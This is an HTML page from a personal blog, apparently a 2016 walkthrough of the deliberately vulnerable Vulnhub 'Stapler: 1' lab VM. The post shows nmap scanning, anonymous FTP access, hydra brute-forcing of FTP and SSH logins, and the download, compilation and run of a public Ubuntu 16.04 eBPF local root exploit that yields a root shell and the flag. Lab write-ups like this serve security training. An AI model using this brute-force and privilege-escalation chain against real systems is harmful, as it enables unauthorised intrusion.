pew
/
paulwalko.github.io
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
paulwalko.github.io/_site/writeup/stapler_walkthough.html

475 lines
20 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Stapler: 1 VM on Vulnhub">
<title>Stapler: 1 Vulnhub Walkthrough</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="https://paul.walko.org/favicon/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
<script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/markdownreader.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/pygments_monokai.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/code_block.css">
</head>
<body>
<header id="l-header">
<div class="container">
<div class="row logo">
<div class="col-lg-7">
<h1>Paul Walko</h1>
</div>
</div>
<div class="row navicon">
<a href=""><i class="fa fa-navicon"></i></a>
</div>
<div class="row navbar">
<nav class="col-lg-8 col-md-8 col-xs-12">
<ul class="row">
<li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
<li class="col-lg-3">
<ul class="subnav">
<a href="javascript:void(0)">POSTS</a>
<li><a href="https://paul.walko.org/category">CATEGORY</a></li>
<li><a href="https://paul.walko.org/tag">TAG</a></li>
</ul>
</li>
<li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
<li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
<div class="search col-lg-4 col-md-4 col-xs-12">
<form id="dummySearch">
<label for="search"></label>
<input id="search" name="serach" type="text" placeholder="Not That Dummy Search">
<i class="fa fa-search"></i>
</form>
<script>
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
</script>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Stapler: 1 Vulnhub Walkthrough</p>
<ul class="tags clearfix">
<li><i class="fa fa-tag"></i> vulnhub</li>
<li><i class="fa fa-tag"></i> hacking</li>
</ul>
<p id="postMeta">posted on 19 Jun 2016 under category <a href="https://paul.walko.org/category/">writeup</a></p>
</header>
<h1 id="figure-out-the-ip">Figure out the IP</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:31:55] [~]
-&gt; % nmap -sn 192.168.1.0/24
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT
.
.
.
Nmap scan report for red (192.168.1.135)
Host is up (0.0030s latency).
.
.
.
Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds
</code></pre>
</div>
<p>Lets see whats there:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:33:59] [~]
-&gt; % nmap -Pn 192.168.1.135
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
Nmap scan report for red (192.168.1.135)
Host is up (0.011s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
</code></pre>
</div>
<h1 id="login-to-ftp">Login to ftp</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:34:57] [~]
-&gt; % ftp
ftp&gt; open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
226 Directory send OK.
ftp&gt; get note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 5.1e-05 seconds (2 Mbytes/s)
ftp&gt; 221 Goodbye.
paul@archyoga [05:36:17] [~]
-&gt; % cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
</code></pre>
</div>
<p>Turns out it is, and inside is a file named <code class="highlighter-rouge">note</code> which names an ftp user: <code class="highlighter-rouge">elly</code>.
I used hydra to test some common passwords and that worked out:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:39:21] [~]
-&gt; % hydra -l elly -e nsr 92.168.1.135 ftp
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.135 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50
</code></pre>
</div>
<p>Now we can login to ftp as elly using the password <code class="highlighter-rouge">ylle</code>. On the ftp server theres a passwd file, so I can use that as a user list to test against:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:42:07] [~]
-&gt; % ftp
ftp&gt; open 192.168.1.135
Connected to 192.168.1.135.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.1.135:paul): elly
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
.
.
.
-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd
.
.
.
ftp&gt; get passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (2908 bytes).
226 Transfer complete.
2908 bytes received in 9.9e-05 seconds (28 Mbytes/s)
ftp&gt; 221 Goodbye.
</code></pre>
</div>
<h1 id="login-over-ssh--exploit">Login over ssh &amp; exploit</h1>
<p>Using hydra again I discovered a login for ssh from the passwd file:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:42:36] [~]
-&gt; % awk -F':' '{ print $1}' passwd &gt; users
-&gt; % hydra -e nsr -L ./users 192.168.1.135 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.135 login: SHayslett password: SHayslett
</code></pre>
</div>
<p>Then once I determined the release I went over to <a href="http://exploit-db.com">http://exploit-db.com</a> and searched “ubuntu 16.04” and found this: https://www.exploit-db.com/exploits/39772/</p>
<p>Now for the exploit:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>paul@archyoga [05:50:44] [~]
-&gt; % ssh SHayslett@192.168.1.135
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.1.135's password:
Welcome back!
SHayslett@red:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2016-06-19 18:49:36-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)... 192.30.252.130
Connecting to github.com (github.com)|192.30.252.130|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2016-06-19 18:49:36-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: 39772.zip
39772.zip 100%[=====================================================================================================================================================================================================&gt;] 6.95K --.-KB/s in 0s
2016-06-19 18:49:37 (94.2 MB/s) - 39772.zip saved [7115/7115]
SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo
--2016-06-19 18:52:05-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi
Resolving github.com (github.com)... 192.30.252.128
Connecting to github.com (github.com)|192.30.252.128|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3
--2016-06-19 18:52:05-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: 39772.zip
39772.zip 100%[=======================
2016-06-19 18:52:05 (4.75 MB/s) - 39772.zip saved [7115/7115]
SHayslett@red:~/tmp$ unzip *
Archive: 39772.zip
creating: 39772/
.
.
.
SHayslett@red:~/tmp$ cd *2
SHayslett@red:~/tmp/39772$ ls
crasher.tar exploit.tar
SHayslett@red:~/tmp/39772$ tar xf exploit.tar
SHayslett@red:~/tmp/39772$ ls
crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function make_setuid:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in &lt;=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
SHayslett@red:~/tmp/39772$ cd e*
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function make_setuid:
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in &lt;=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit#
</code></pre>
</div>
<p>This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/.</p>
<p>Next, the flag!</p>
<div class="highlighter-rouge"><pre class="highlight"><code>root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
root@red:/root# ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
root@red:/root# cat flag.txt
~~~~~~~~~~&lt;(Congratulations)&gt;~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
</code></pre>
</div>
<p>Woo!</p>
</div>
<div id="markdown-outline" class="col-lg-3">
</div>
<div id="disqus_thread"></div>
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
<footer id="l-footer">
<div class="container">
<div class="row">
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
<h3>CONTACT</h3>
<div class="row">
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
United States<br>
Paul Walko<br>
</address>
<ul class="col-lg-6 col-md-6 col-sm-6">
<li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> &nbsp;&nbsp;paulsw.pw@gmail.com</a></li>
<li class="github"><i class="fa fa-github"></i> <a href="https://www.github.com/paulwalko"> &nbsp;&nbsp;https://www.github.com/paulwalko</a></li>
</ul>
</div>
</div>
</div>
<p id="legal">
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; built by <a href="http://unifreak.github.io">UniFreak</a>
</p>
</div>
</footer>
<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
<script type="text/javascript" src="https://paul.walko.org/javascripts/markdownreader.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink